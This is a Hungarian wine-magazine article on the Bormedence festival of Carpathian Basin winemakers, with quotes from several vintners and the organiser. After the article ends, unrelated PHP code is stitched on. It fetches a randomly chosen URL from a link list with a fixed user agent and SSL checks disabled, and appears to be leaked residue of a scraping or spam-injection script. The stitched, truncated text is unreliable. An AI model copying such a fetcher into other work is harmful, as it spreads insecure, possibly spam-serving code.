Örömünnep

Kellemes borok, jó hangulat, egyszóval: Bormedence. A rangos eseményre szép számmal érkeztek borászok Érmelléktől Baranyáig, Felvidéktől Délvidékig. A szervezők mindent elkövettek, hogy az érdeklődőknek, látogatóknak izgalmas, maradandó élményben legyen részük. Fotó: Bakos Studio Határtalanul. Röviden így jellemezhetnénk a Kárpát-medencei borkultúra bemutatóját. Közel ötven kiállító, köztük 20 itthoni és 16 külhoni magyar borász adott ízelítőt a... Tovább..


Kellemes borok, jó hangulat, egyszóval: Bormedence. A rangos eseményre szép számmal érkeztek borászok Érmelléktől Baranyáig, Felvidéktől Délvidékig. A szervezők mindent elkövettek, hogy az érdeklődőknek, látogatóknak izgalmas, maradandó élményben legyen részük.

Fotó: Bakos Studio

Határtalanul. Röviden így jellemezhetnénk a Kárpát-medencei borkultúra bemutatóját. Közel ötven kiállító, köztük 20 itthoni és 16 külhoni magyar borász adott ízelítőt a térség boraiból, a hagyományos szőlőfajták és a különböző régiók révén. Bárhonnan – Újvidék, Erdély, Kárpátalja, Felvidék, Szlovénia, Ausztria – érkeztek is a randevúra, az összetartozás letagadhatatlan volt. A különlegességeket képviselte a csóka, a blauburger, a fekete lányka, a dél-szlovákiai PEMAK pincészet egyenesen pedig mákborral hívta fel magára a figyelmet. Mesterkurzuson mutatkozott be az érmelléki bakator, a furmint pedig 15 különböző tétellel igazolta hírnevét.

Közülük az egyik a mádi Lenkey Pincészeté volt. A tíz éves kései szüretelésű bor megmutatta a fajta lehető legjobb tulajdonságait. Az Úrágya kiegyensúlyozott, igazi csúcskategóriás bor, a dűlő- és fajtaszelektált eljárás valamennyi erényével. Az alkotó Lenkey Géza szerényen nem a saját borát, hanem a rendezvényt dicsérte: „Kicsit félve jöttem, de elismerésem a szervezőké. Ahogy az élet más területén, így a borászatban is az összetartás a fontos, és ez kiváló alkalom erre. Csodálatos szerémségi borokat kóstoltam, van jövője a Bormedencének.”

Fotó: Bakos Studio

Természetesen nemcsak a határon túliak hoztak különlegességeket, hanem az itthoniak is. A fertőbozi Vincellér Pincészet egyik legnépszerűbb bora a kékfrankos rozé volt, amely palackozás előtt két évet pihent tölgyfa hordóban, így a szokottól eltérő karakterű, határozottabb, inkább terroirbor lett a végeredmény. Molnár Tibor borász szerint a kísérletezés nem hozott csalódást.

Elismeréssel szólt az új kezdeményezésről Dúzsi Bence is. Véleménye szerint ez olyan új irányvonal, amelyen érdemes elgondolkodni. A családi pincészet egyébként a Fürtikével (tramini, hárslevelű), egy ’17-es rozé cuvée-vel, valamint három vörösborral – Kadarka, Óvörös és a Grabóc bordeaux-i házasítás – járult hozzá az esemény színvonalához. Bence szerint a mostani borgála méltó folytatása a korábbi budafoki rendezvényeknek. „Jó borok, jó emberek összejövetele ez, kellő szakmaisággal.”

Fotó: Bakos Studio

Az eddigi kárpátaljai bortalálkozók folytatásaként, kétéves szünet után született a Bormedence. Az ötletgazdák szívügyüknek érzik a hagyományok ápolását, a magyar borkultúra egységesítését. „Ez egy örömünnep – mondja Krizmanits József főszervező –, és ebben a bor csak egy láncszem, kiváló eszköz. Akik eljöttek, nem csalódtak az izgalmas, sokszínű kínálatban, amely hűen tükrözte a színvonalat és a különleges magyar ízlésvilágot.”

Szerző: Török Ferenc

The post Örömünnep appeared first on VinCE Magazin.


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>